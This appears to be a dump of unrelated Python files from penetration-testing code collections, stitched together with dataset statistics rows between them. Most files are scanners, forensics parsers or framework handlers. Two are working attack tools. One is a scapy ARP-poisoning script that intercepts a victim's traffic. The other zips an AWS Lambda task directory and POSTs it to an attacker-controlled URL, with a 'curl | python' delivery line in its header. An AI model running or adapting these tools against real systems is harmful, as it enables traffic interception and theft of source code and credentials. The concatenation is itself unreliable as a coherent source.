        file_server_host = self.request.host.replace(str(SERVER_PORT), str(FILE_SERVER_PORT))
        base_url = "{}://{}/".format(self.request.protocol, file_server_host)
        # plus=False: encode spaces as %20 rather than '+'.
        self.redirect(base_url + url_escape(file_url, plus=False), permanent=True)
| 33.834783 | 117 | 0.613282 |
cybersecurity-penetration-testing | from scapy.all import *
import os
import sys
import threading
# Attack parameters: victim, gateway, capture interface and packet budget.
interface = "en1"
target_ip = "172.16.1.71"
gateway_ip = "172.16.1.254"
packet_count = 1000
# Flag polled by the poisoning thread; flipping it to False stops the attack.
poisoning = True
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
    """Re-ARP the victim and gateway with the real MAC addresses (scapy)."""
    # slightly different method using send
    print "[*] Restoring target..."
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)
def get_mac(ip_address):
    """Resolve ip_address to a MAC via a broadcast ARP who-has; None on failure."""
    responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
    # return the MAC address from a response
    for s,r in responses:
        return r[Ether].src
    return None
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
    """Send spoofed is-at ARP replies both ways every 2s until `poisoning`
    is cleared, putting this host in the middle of victim<->gateway traffic."""
    global poisoning
    # NOTE(review): this local shadows the function's own name; harmless here
    # because the function is only started once, but confusing.
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst= target_mac
    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst= gateway_mac
    print "[*] Beginning the ARP poison. [CTRL-C to stop]"
    while poisoning:
        send(poison_target)
        send(poison_gateway)
        time.sleep(2)
    print "[*] ARP poison attack finished."
    return
# set our interface
conf.iface = interface
# turn off output
conf.verb = 0
print "[*] Setting up %s" % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
    print "[!!!] Failed to get gateway MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip,target_mac)
# start poison thread
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac))
poison_thread.start()
try:
    # Capture the victim's traffic while the poison is active.
    print "[*] Starting sniffer for %d packets" % packet_count
    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
except KeyboardInterrupt:
    pass
finally:
    # write out the captured packets
    print "[*] Writing packets to arper.pcap"
    wrpcap('arper.pcap',packets)
    # Stop the poisoning loop, give it time to exit, then heal the ARP caches.
    # NOTE(review): `time` is not imported explicitly here; presumably it is
    # provided by scapy's star import — confirm before relying on it.
    poisoning = False
    # wait for poisoning thread to exit
    time.sleep(2)
    # restore the network
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
sys.exit(0)
| 24.311321 | 107 | 0.653244 |
cybersecurity-penetration-testing | import os
import collections
import platform
import socket, subprocess,sys
import threading
from datetime import datetime
''' section 1 '''
# Read the network prefix and the host-number range to sweep (Python 2).
net = raw_input("Enter the Network Address ")
net1= net.split('.')
a = '.'
# Keep only the first three octets, e.g. "192.168.0." (trailing dot kept so
# host numbers can be appended directly).
net2 = net1[0]+a+net1[1]+a+net1[2]+a
st1 = int(raw_input("Enter the Starting Number "))
en1 = int(raw_input("Enter the Last Number "))
en1 =en1+1
# Shared result list filled by the worker threads.
list1 = []
# Pick the single-probe ping flag for this OS: -n on Windows, -c elsewhere.
oper = platform.system()
if (oper=="Windows"):
    ping1 = "ping -n 1 "
elif (oper== "Linux"):
    ping1 = "ping -c 1 "
else :
    ping1 = "ping -c 1 "
t1= datetime.now()
'''section 2'''
class myThread (threading.Thread):
    # Worker thread that ping-sweeps one slice [st, en) of the host range.
    def __init__(self,st,en):
        threading.Thread.__init__(self)
        self.st = st
        self.en = en
    def run(self):
        # Delegate the actual sweep to the module-level run1().
        run1(self.st,self.en)
'''section 3'''
def run1(st1,en1):
    """Ping every host net2.<st1..en1-1> once; append responders to list1.

    A host counts as live when the ping output contains "TTL" (matches
    Windows-style replies; NOTE: Linux ping typically prints lowercase
    "ttl", so Linux replies may be missed — confirm for your platform).
    """
    for ip in xrange(st1,en1):
        addr = net2+str(ip)
        comm = ping1+addr
        response = os.popen(comm)
        # BUG FIX: pre-initialise `line` — if the ping command produces no
        # output, the loop body never runs and the check below used to raise
        # UnboundLocalError.
        line = ''
        for line in response.readlines():
            if(line.count("TTL")):
                break
        if (line.count("TTL")):
            list1.append(addr)
''' Section 4 '''
# Split the st1..en1 host range into chunks of `tn` addresses and hand each
# chunk to its own scanner thread.
total_ip =en1-st1
tn =20 # number of ip handled by one thread
total_thread = total_ip/tn
total_thread=total_thread+1
threads= []
try:
    for i in xrange(total_thread):
        # Clamp the last chunk so it does not run past en1.
        en = st1+tn
        if(en >en1):
            en =en1
        thread = myThread(st1,en)
        thread.start()
        threads.append(thread)
        # Next chunk starts where this one ended.
        st1 =en
except:
    # NOTE(review): bare except hides the real failure reason.
    print "Error: unable to start thread"
print "\tNumber of Threads active:", threading.activeCount()
# Wait for every scanner thread to finish before printing results.
for t in threads:
    t.join()
print "Exiting Main Thread"
# Sort the live hosts for stable output.
list1.sort()
for key in list1:
    print key,"-->" "Live"
# Total scan duration (t1 is taken before the threads are started).
t2= datetime.now()
total =t2-t1
print "scanning complete in " , total | 20.723684 | 60 | 0.653333 |
owtf | """
owtf.api.handlers.config
~~~~~~~~~~~~~~~~~~~~~~~~
"""
from owtf.api.handlers.base import APIRequestHandler
from owtf.lib import exceptions
from owtf.lib.exceptions import APIError
from owtf.managers.config import get_all_config_dicts, update_config_val
__all__ = ["ConfigurationHandler"]
class ConfigurationHandler(APIRequestHandler):
"""Update framework settings and tool paths."""
SUPPORTED_METHODS = ["GET", "PATCH"]
def get(self):
"""Return all configuration items.
**Example request**:
.. sourcecode:: http
GET /api/v1/configuration HTTP/1.1
Accept: application/json
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "success",
"data": [
{
"dirty": false,
"key": "ATTACHMENT_NAME",
"descrip": "Filename for the attachment to be sent",
"section": "AUX_PLUGIN_DATA",
"value": "report"
},
{
"dirty": false,
"key": "BRUTEFORCER",
"descrip": "",
"section": "DICTIONARIES",
"value": "hydra"
},
]
}
"""
filter_data = dict(self.request.arguments)
configurations = get_all_config_dicts(self.session, filter_data)
grouped_configurations = {}
for config in configurations:
if config["section"] not in grouped_configurations:
grouped_configurations[config["section"]] = []
grouped_configurations[config["section"]].append(config)
self.success(grouped_configurations)
def patch(self):
"""Update configuration item
**Example request**:
.. sourcecode:: http
PATCH /api/v1/configuration/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "success",
"data": null
}
"""
for key, value_list in list(self.request.arguments.items()):
try:
update_config_val(self.session, key, value_list[0])
self.success(None)
except exceptions.InvalidConfigurationReference:
raise APIError(422, "Invalid configuration item specified")
| 27.783505 | 76 | 0.505912 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: June 2015
Name: multi_threaded.py
Purpose: To identify live web applications with a list of IP addresses, using concurrent threads
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import urllib2, argparse, sys, threading, logging, Queue, time
queue = Queue.Queue()
lock = threading.Lock()
class Agent(threading.Thread):
    """Worker thread that HEAD-requests each queued host over HTTP and HTTPS.

    Hosts are consumed from the shared module-level `queue`; all logging and
    printing is serialised through the module-level `lock`.
    """
    def __init__(self, queue, logger, verbose):
        threading.Thread.__init__(self)
        self.queue = queue      # shared Queue of hostnames to probe
        self.logger = logger    # shared logging agent
        self.verbose = verbose  # verbosity level (not consulted in run())
    def run(self):
        while True:
            host = self.queue.get()
            # NOTE: the original used the Python 2 `print(...) % args` idiom;
            # formatting inside the call produces identical output and also
            # works under Python 3.
            print("[*] Testing %s" % (str(host)))
            target = "http://" + host
            target_secure = "https://" + host
            # --- insecure (http) probe ---
            try:
                request = urllib2.Request(target)
                request.get_method = lambda : 'HEAD'
                response = urllib2.urlopen(request)
            except:
                with lock:
                    self.logger.debug("[-] No web server at %s reported by thread %s" % (str(target), str(threading.current_thread().name)))
                    print("[-] No web server at %s reported by thread %s" % (str(target), str(threading.current_thread().name)))
                response = None
            if response is not None:
                with lock:
                    self.logger.debug("[+] Response from %s reported by thread %s" % (str(target), str(threading.current_thread().name)))
                    print("[*] Response from insecure service on %s reported by thread %s" % (str(target), str(threading.current_thread().name)))
                self.logger.debug(response.info())
            # --- secure (https) probe ---
            try:
                # BUG FIX: build a Request for the https URL. The original
                # opened the URL directly and then referenced an undefined
                # `request_secure`, raising NameError inside the try and
                # making every https probe report a failure.
                request_secure = urllib2.Request(target_secure)
                request_secure.get_method = lambda : 'HEAD'
                response_secure = urllib2.urlopen(request_secure)
            except:
                with lock:
                    self.logger.debug("[-] No secure web server at %s reported by thread %s" % (str(target_secure), str(threading.current_thread().name)))
                    print("[-] No secure web server at %s reported by thread %s" % (str(target_secure), str(threading.current_thread().name)))
                response_secure = None
            if response_secure is not None:
                with lock:
                    self.logger.debug("[+] Secure web server at %s reported by thread %s" % (str(target_secure), str(threading.current_thread().name)))
                    print("[*] Response from secure service on %s reported by thread %s" % (str(target_secure), str(threading.current_thread().name)))
                self.logger.debug(response_secure.info())
            # Mark this work item done so queue.join() can unblock.
            self.queue.task_done()
def main():
    """CLI entry point: parse arguments, configure file logging, then spawn
    worker threads that probe every host listed in the targets file."""
    usage = '''usage: %(prog)s [-t hostfile] [-m threads] [-f filename] [-l logfile.log] [-m 2] -q -v -vv -vvv'''
    parser = argparse.ArgumentParser(usage=usage)
    parser.add_argument("-t", action="store", dest="targets", default=None, help="Filename for hosts to test")
    parser.add_argument("-f", "--filename", type=str, action="store", dest="filename", default="xml_output", help="The filename that will be used to create an XLSX")
    parser.add_argument("-m", "--multi", action="store", dest="threads", default=1, type=int, help="Number of threads, defaults to 1")
    parser.add_argument("-l", "--logfile", action="store", dest="log", default="results.log", type=str, help="The log file to output the results")
    parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
    parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
    parser.add_argument('--version', action='version', version='%(prog)s 0.42b')
    args = parser.parse_args()
    # Argument validation: require at least one flag and a targets file.
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)
    if args.targets is None:
        parser.print_help()
        sys.exit(1)
    targets = args.targets   # file listing hosts to probe
    verbose = args.verbose   # verbosity level passed to workers
    threads = args.threads   # number of worker threads to spawn
    log = args.log           # log file name, normalised to end in ".log"
    if ".log" not in log:
        log = log + ".log"
    # Configure the shared root logger: everything goes to the log file.
    # BUG FIX: the handler previously opened args.log directly, silently
    # ignoring the ".log" suffix normalisation computed just above.
    level = logging.DEBUG
    log_format = logging.Formatter("%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s")
    logger_obj = logging.getLogger()
    file_handler = logging.FileHandler(log)
    file_handler.setFormatter(log_format)
    logger_obj.addHandler(file_handler)
    logger_obj.setLevel(level)
    # Load the targets into a list and remove trailing "\n"
    with open(targets) as f:
        targets_list = [line.rstrip() for line in f.readlines()]
    # Spawn daemon workers, then queue one work item per target host.
    for _ in range(0, threads):
        worker = Agent(queue, logger_obj, verbose)
        worker.setDaemon(True)
        worker.start()
    for target in targets_list:
        queue.put(target)
    # Block until every queued host has been processed.
    queue.join()
if __name__ == '__main__':
    main()
| 51.992958 | 165 | 0.604466 |
cybersecurity-penetration-testing | import zipfile
import os
from time import gmtime, strftime
from lxml import etree
import processors
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = 'This scripts parses embedded metadata from office files'
def officeParser(filename):
    """
    The officeParser function confirms the file type and sends it to be processed.
    :param filename: name of the file potentially containing embedded metadata.
    :return: A dictionary from getTags, containing the embedded metadata.
    """
    # DOCX, XLSX and PPTX files are ZIP containers and share this 8-byte
    # hex-encoded header signature.
    signatures = ['504b030414000600']
    if processors.utility.checkHeader(filename, signatures, 8) == True:
        return getTags(filename)
    else:
        print 'File signature does not match known Office Document signatures.'
        raise TypeError('File signature does not match known Office Document signatures.')
def getTags(filename):
    """
    The getTags function extracts the office metadata from the data object.
    :param filename: the path and name to the data object.
    :return: tags and headers, tags is a dictionary containing office metadata and headers are the
    order of keys for the CSV output.
    """
    # Set up CSV headers
    headers = ['Path', 'Name', 'Size', 'Filesystem CTime', 'Filesystem MTime', 'Title', 'Author(s)','Create Date',
               'Modify Date', 'Last Modified By Date', 'Subject', 'Keywords', 'Description', 'Category', 'Status',
               'Revision', 'Edit Time (Min)', 'Page Count', 'Word Count', 'Character Count', 'Line Count',
               'Paragraph Count', 'Slide Count', 'Note Count', 'Hidden Slide Count', 'Company', 'Hyperlink Base']
    # Create a ZipFile class from the input object. This allows us to read or write to the 'Zip archive'.
    zf = zipfile.ZipFile(filename)
    # These two XML files contain the embedded metadata of interest.
    try:
        core = etree.fromstring(zf.read('docProps/core.xml'))
        app = etree.fromstring(zf.read('docProps/app.xml'))
    except KeyError, e:
        # Archive member missing: warn and return an empty tag dict so the
        # caller still gets the expected (tags, headers) shape.
        assert Warning(e)
        return {}, headers
    tags = {}
    # Filesystem-level metadata comes straight from the path, not the XML.
    tags['Path'] = filename
    tags['Name'] = os.path.basename(filename)
    tags['Size'] = processors.utility.convertSize(os.path.getsize(filename))
    tags['Filesystem CTime'] = strftime('%m/%d/%Y %H:%M:%S', gmtime(os.path.getctime(filename)))
    tags['Filesystem MTime'] = strftime('%m/%d/%Y %H:%M:%S', gmtime(os.path.getmtime(filename)))
    # Core Tags: shared Dublin-Core-style properties from docProps/core.xml.
    for child in core.iterchildren():
        if 'title' in child.tag:
            tags['Title'] = child.text
        if 'subject' in child.tag:
            tags['Subject'] = child.text
        if 'creator' in child.tag:
            tags['Author(s)'] = child.text
        if 'keywords' in child.tag:
            tags['Keywords'] = child.text
        if 'description' in child.tag:
            tags['Description'] = child.text
        if 'lastModifiedBy' in child.tag:
            tags['Last Modified By Date'] = child.text
        if 'created' in child.tag:
            tags['Create Date'] = child.text
        if 'modified' in child.tag:
            tags['Modify Date'] = child.text
        if 'category' in child.tag:
            tags['Category'] = child.text
        if 'contentStatus' in child.tag:
            tags['Status'] = child.text
        if filename.endswith('.docx') or filename.endswith('.pptx'):
            if 'revision' in child.tag:
                tags['Revision'] = child.text
    # App Tags: application-specific statistics from docProps/app.xml;
    # available fields differ per Office document type.
    for child in app.iterchildren():
        if filename.endswith('.docx'):
            if 'TotalTime' in child.tag:
                tags['Edit Time (Min)'] = child.text
            if 'Pages' in child.tag:
                tags['Page Count'] = child.text
            if 'Words' in child.tag:
                tags['Word Count'] = child.text
            if 'Characters' in child.tag:
                tags['Character Count'] = child.text
            if 'Lines' in child.tag:
                tags['Line Count'] = child.text
            if 'Paragraphs' in child.tag:
                tags['Paragraph Count'] = child.text
            if 'Company' in child.tag:
                tags['Company'] = child.text
            if 'HyperlinkBase' in child.tag:
                tags['Hyperlink Base'] = child.text
        elif filename.endswith('.pptx'):
            if 'TotalTime' in child.tag:
                tags['Edit Time (Min)'] = child.text
            if 'Words' in child.tag:
                tags['Word Count'] = child.text
            if 'Paragraphs' in child.tag:
                tags['Paragraph Count'] = child.text
            if 'Slides' in child.tag:
                tags['Slide Count'] = child.text
            if 'Notes' in child.tag:
                tags['Note Count'] = child.text
            if 'HiddenSlides' in child.tag:
                tags['Hidden Slide Count'] = child.text
            if 'Company' in child.tag:
                tags['Company'] = child.text
            if 'HyperlinkBase' in child.tag:
                tags['Hyperlink Base'] = child.text
        else:
            # XLSX: only the company/hyperlink-base fields are collected.
            if 'Company' in child.tag:
                tags['Company'] = child.text
            if 'HyperlinkBase' in child.tag:
                tags['Hyperlink Base'] = child.text
    return tags, headers
| 38.686567 | 114 | 0.586797 |
cybersecurity-penetration-testing | #!/usr/bin/env python
#
# This script can be used to exfiltrate all of the AWS Lambda source files from
# $LAMBDA_TASK_ROOT (typically: /var/task) in a form of out-of-band http/s POST
# request. Such request will contain an `exfil` variable with urlencode(base64(zip_file)) in it.
# This zip file then will contain all of the $LAMBDA_TASK_ROOT (/var/task) directory contents.
#
# Can be used with webhook.site, using similar OS command as following:
#
# $ curl -s https://<ATTACKER>/exfiltrateLambdaTasksDirectory.py | python
#
# Author: Mariusz Banach, '19, <mb@binary-offensive.com>
#
import zipfile, StringIO
import base64, os, sys
import urllib, urllib2, ssl
#
# Set below address to the HTTP(S) web server that will receive exfiltrated
# ZIP file in a form of a HTTP POST request (within parameter 'exfil')
#
EXFILTRATE_OUTBAND_ADDRESS = 'https://<ATTACKER>/lambda-exfil'
class InMemoryZip(object):
    """Build a ZIP archive entirely in memory (no temp files on disk),
    backed by a Python 2 StringIO buffer."""
    # Source:
    # - https://www.kompato.com/post/43805938842/in-memory-zip-in-python
    # - https://stackoverflow.com/a/2463818
    def __init__(self):
        self.in_memory_zip = StringIO.StringIO()
    def append(self, filename_in_zip, file_contents):
        """Add one file to the archive; returns self so calls can be chained."""
        # Re-open the underlying buffer in append mode for each added file.
        zf = zipfile.ZipFile(self.in_memory_zip, "a", zipfile.ZIP_DEFLATED, False)
        zf.writestr(filename_in_zip, file_contents)
        # Force each entry's "created by" system field to 0 (MS-DOS/FAT).
        for zfile in zf.filelist:
            zfile.create_system = 0
        return self
    def read(self):
        """Return the full ZIP archive contents as a byte string."""
        self.in_memory_zip.seek(0)
        return self.in_memory_zip.read()
def fetch_files(imz, rootdir):
    """Walk `rootdir` recursively and append every file found to the
    in-memory zip `imz`, keyed by its path relative to `rootdir`."""
    for current_dir, _subdirs, filenames in os.walk(rootdir):
        for name in filenames:
            full_path = os.path.join(current_dir, name)
            archive_name = full_path.replace(rootdir + '/', '')
            with open(full_path, 'r') as handle:
                imz.append(archive_name, handle.read())
def post(data):
    """POST `data` (base64-encoded) to the attacker's collection endpoint
    as form field `exfil`, using browser-like request headers."""
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
    }
    data = {'exfil': base64.b64encode(data)}
    data = urllib.urlencode(data)
    # Disable TLS certificate verification so a self-signed listener works.
    ssl._create_default_https_context = ssl._create_unverified_context
    r = urllib2.Request(EXFILTRATE_OUTBAND_ADDRESS, data=data, headers=headers)
    resp = urllib2.urlopen(r)
    # Drain the response body; the reply content itself is ignored.
    if resp: resp.read()
def main():
    """Zip the whole Lambda task directory and POST it out-of-band."""
    rootdir = os.environ['LAMBDA_TASK_ROOT']
    imz = InMemoryZip()
    fetch_files(imz, rootdir)
    post(imz.read())
# Swallow every error so the payload never crashes the hosting Lambda.
try:
    main()
except:
    pass
| 31.4 | 96 | 0.653416 |
Mastering-Machine-Learning-for-Penetration-Testing | from pandas import read_csv
# Feature selection with Recursive Feature Elimination (RFE) on the Pima
# Indians diabetes dataset: keep the three strongest predictors.
from sklearn.feature_selection import RFE
from sklearn.linear_model import LogisticRegression
# load data
url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/pima-indians-diabetes.data.csv"
names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class']
dataframe = read_csv(url, names=names)
array = dataframe.values
X = array[:,0:8]  # the eight predictor columns
Y = array[:,8]    # the class label column
# feature extraction: recursively drop the weakest feature until 3 remain
model = LogisticRegression()
rfe = RFE(model, 3)
fit = rfe.fit(X, Y)
# BUG FIX: the original used the Python 2 idiom `print("...") % value`,
# which raises TypeError under Python 3 (None % value); formatting inside
# the call produces identical output on both versions.
print("Num Features: %d" % fit.n_features_)
print("Selected Features: %s" % fit.support_)
print("Feature Ranking: %s" % fit.ranking_)
| 34.277778 | 98 | 0.712934 |
cybersecurity-penetration-testing | __author__ = 'Preston Miller & Chapin Bryce'
__version__ = '20150822'
__date__ = '0.01'
import urllib
import ast
class IPtoGeo(object):
    """Resolve an IP address to geolocation data via the hostip.info API.

    On construction the API is queried immediately; country, country_code,
    city, latitude and longitude are stored as instance attributes.
    """
    def __init__(self, ip_address):
        # Initialize storage for the location attributes.
        self.latitude = ''
        self.longitude = ''
        self.country = ''
        self.city = ''
        self.ip_address = ip_address
        self._get_location()

    def _get_location(self):
        """
        Retrieve initial location data (country, city, lat/long) from hostip.info
        :return:
        """
        import json  # local import keeps this fix self-contained
        request = urllib.urlopen('http://api.hostip.info/get_json.php?ip=%s&position=true' % self.ip_address).read()
        # BUG FIX: parse the response with the json module. ast.literal_eval
        # cannot handle the JSON literals true/false/null and raised on any
        # response containing them.
        json_request = json.loads(request)
        self.country = json_request['country_name']
        self.country_code = json_request['country_code']
        self.city = json_request['city']
        self.latitude = json_request['lat']
        self.longitude = json_request['lng']
if __name__ == '__main__':
    # Quick self-test: geolocate two well-known addresses and dump the
    # resulting attribute dictionaries.
    ip1 = IPtoGeo('8.8.8.8')
    ip2 = IPtoGeo('12.215.42.19')
    print ip1.__dict__
print ip2.__dict__ | 26.025 | 116 | 0.575926 |
Python-Penetration-Testing-for-Developers | #Linear Conruential Generator reverse from known mod, multiplier and increment + final 2 chars of each random value
# Brute-force the seed of a Linear Congruential Generator from the known
# modulus, multiplier and increment plus the final 2 characters of each
# observed output. Replace the hardcoded numbers with your known numbers.

# Numerical Recipes LCG parameters used by the target generator.
LCG_MULTIPLIER = 1664525
LCG_INCREMENT = 1013904223
LCG_MODULUS = 2 ** 31

# Observed trailing two digits of eleven consecutive generator outputs.
KNOWN_SUFFIXES = ("47", "46", "57", "56", "07", "38", "81", "32", "19", "70", "53")


def lcg_next(state):
    """Advance the LCG one step and return the new state as an int."""
    return (LCG_MULTIPLIER * state + LCG_INCREMENT) % LCG_MODULUS


def check_candidate(candidate):
    """Return the final generator state (as a string) if seeding the LCG with
    int(str(candidate) + '00') reproduces every suffix in KNOWN_SUFFIXES in
    order; otherwise return None."""
    state = str(lcg_next(int(str(candidate) + '00')))
    if state[-2:] != KNOWN_SUFFIXES[0]:
        return None
    for expected in KNOWN_SUFFIXES[1:]:
        state = str(lcg_next(int(state)))
        if state[-2:] != expected:
            return None
    return state


def main():
    """Scan candidate seeds; on a hit, print the recovered state and predict
    the trailing digits of the next nine outputs (the original's nested
    11-level if chain, flattened)."""
    print("Starting attempt to brute")
    for candidate in range(100000, 99999999):
        state = check_candidate(candidate)
        if state is None:
            continue
        print("potential number found: " + state)
        print("next 9 values are:")
        for _ in range(9):
            state = str(lcg_next(int(state)))
            print(state[-2:])


if __name__ == '__main__':
    main()
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import json
import urllib
from anonBrowser import *
class reconPerson:
def __init__(self,first_name,last_name,\
job='',social_media={}):
self.first_name = first_name
self.last_name = last_name
self.job = job
self.social_media = social_media
def __repr__(self):
return self.first_name + ' ' +\
self.last_name + ' has job ' + self.job
def get_social(self, media_name):
if self.social_media.has_key(media_name):
return self.social_media[media_name]
return None
def query_twitter(self, query):
query = urllib.quote_plus(query)
results = []
browser = anonBrowser()
response = browser.open(\
'http://search.twitter.com/search.json?q='+ query)
json_objects = json.load(response)
for result in json_objects['results']:
new_result = {}
new_result['from_user'] = result['from_user_name']
new_result['geo'] = result['geo']
new_result['tweet'] = result['text']
results.append(new_result)
return results
ap = reconPerson('Boondock', 'Saint')
print ap.query_twitter(\
'from:th3j35t3r since:2010-01-01 include:retweets')
| 26.382979 | 62 | 0.581649 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
PenTesting | from hashlib import sha1
from re import subn
def hash(word):
nr = 1345345333
add = 7
nr2 = 0x12345671
for c in (ord(x) for x in word if x not in (' ', '\t')):
nr^= (((nr & 63)+add)*c)+ (nr << 8) & 0xFFFFFFFF
nr2= (nr2 + ((nr2 << 8) ^ nr)) & 0xFFFFFFFF
add= (add + c) & 0xFFFFFFFF
return {"%08x%08x" % (nr & 0x7FFFFFFF,nr2 & 0x7FFFFFFF):word.strip('\n')}
| 28.5 | 77 | 0.521845 |
owtf | """
owtf.protocols.smb
~~~~~~~~~~~~~~~~~~
This is the handler for the Social Engineering Toolkit (SET) trying to overcome
the limitations of set-automate.
"""
import logging
import os
from owtf.db.session import get_scoped_session
from owtf.shell import pexpect_sh
from owtf.utils.file import FileOperations
__all__ = ["smb"]
class SMB(pexpect_sh.PExpectShell):
    """SMB share handler: mounts a remote share, transfers files, unmounts.

    Drives ``smbmount``/``umount`` through the interactive shell provided by
    :class:`pexpect_sh.PExpectShell` so the share password can be fed to the
    interactive prompt.
    NOTE(review): ``self.options`` (read by :meth:`transfer` and
    :meth:`unmount`) is presumably stored by the inherited ``open()`` call —
    it is never assigned in this class; confirm against the base class.
    """

    def __init__(self):
        # Calling parent class to do its init part.
        pexpect_sh.PExpectShell.__init__(self)
        self.session = get_scoped_session()
        self.command_time_offset = "SMBCommand"  # label used when timing commands
        self.mounted = False  # tracks whether the share is currently mounted

    def is_mounted(self):
        """Return True when the SMB share is currently mounted."""
        return self.mounted

    def set_mounted(self, value):
        """Record the current mount state (boolean)."""
        self.mounted = value

    def check_mount_point_existence(self, options):
        """Create the local mount point directory if it does not exist yet."""
        if not os.path.exists(options["SMB_MOUNT_POINT"]):
            FileOperations.make_dirs(options["SMB_MOUNT_POINT"])

    def mount(self, options, plugin_info):
        """Mount //SMB_HOST/SMB_SHARE on SMB_MOUNT_POINT.

        No-op (returns True) when already mounted.  Sends SMB_PASS — or a
        blank line when no password was given — to smbmount's prompt.
        """
        if self.is_mounted():
            return True
        logging.info("Initialising shell..")
        self.open(options, plugin_info)
        logging.info("Ensuring Mount Point %s exists...", options["SMB_MOUNT_POINT"])
        self.check_mount_point_existence(options)
        mount_cmd = "smbmount //{}/{} {}".format(options["SMB_HOST"], options["SMB_SHARE"], options["SMB_MOUNT_POINT"])
        if options["SMB_USER"]:  # Pass user if specified.
            mount_cmd += " -o user={}".format(options["SMB_USER"])
        logging.info("Mounting share..")
        self.run(mount_cmd, plugin_info)
        self.expect("Password:")
        if options["SMB_PASS"]:  # Pass password if specified.
            self.run(options["SMB_PASS"], plugin_info)
        else:
            self.run("", plugin_info)  # Send blank line.
        self.expect("#")  # Wait for the shell prompt to come back.
        self.set_mounted(True)

    def transfer(self):
        """Run the download and/or upload requested in ``self.options``."""
        operation = False
        if self.options["SMB_DOWNLOAD"]:
            self.download("{}/{}".format(self.options["SMB_MOUNT_POINT"], self.options["SMB_DOWNLOAD"]), ".")
            operation = True
        if self.options["SMB_UPLOAD"]:
            self.upload(self.options["SMB_UPLOAD"], self.options["SMB_MOUNT_POINT"])
            operation = True
        if not operation:
            logging.info("Nothing to do: no SMB_DOWNLOAD or SMB_UPLOAD specified..")

    def unmount(self, plugin_info):
        """Unmount the share (if mounted) and close the shell."""
        if self.is_mounted():
            # BUG FIX: the original used "umount %s".format(...), which left
            # the %s placeholder unsubstituted and ran the literal command
            # `umount %s` instead of unmounting the real mount point.
            self.shell_exec_monitor(
                session=self.session,
                command="umount {}".format(self.options["SMB_MOUNT_POINT"]),
                plugin_info=dict(),
            )
            self.set_mounted(False)
        self.close(plugin_info)

    def upload(self, file_path, mount_point):
        """Recursively copy a local file/directory onto the mounted share."""
        logging.info("Copying %s to %s", file_path, mount_point)
        self.shell_exec_monitor(
            session=self.session, command="cp -r {} {}".format(file_path, mount_point), plugin_info=dict()
        )
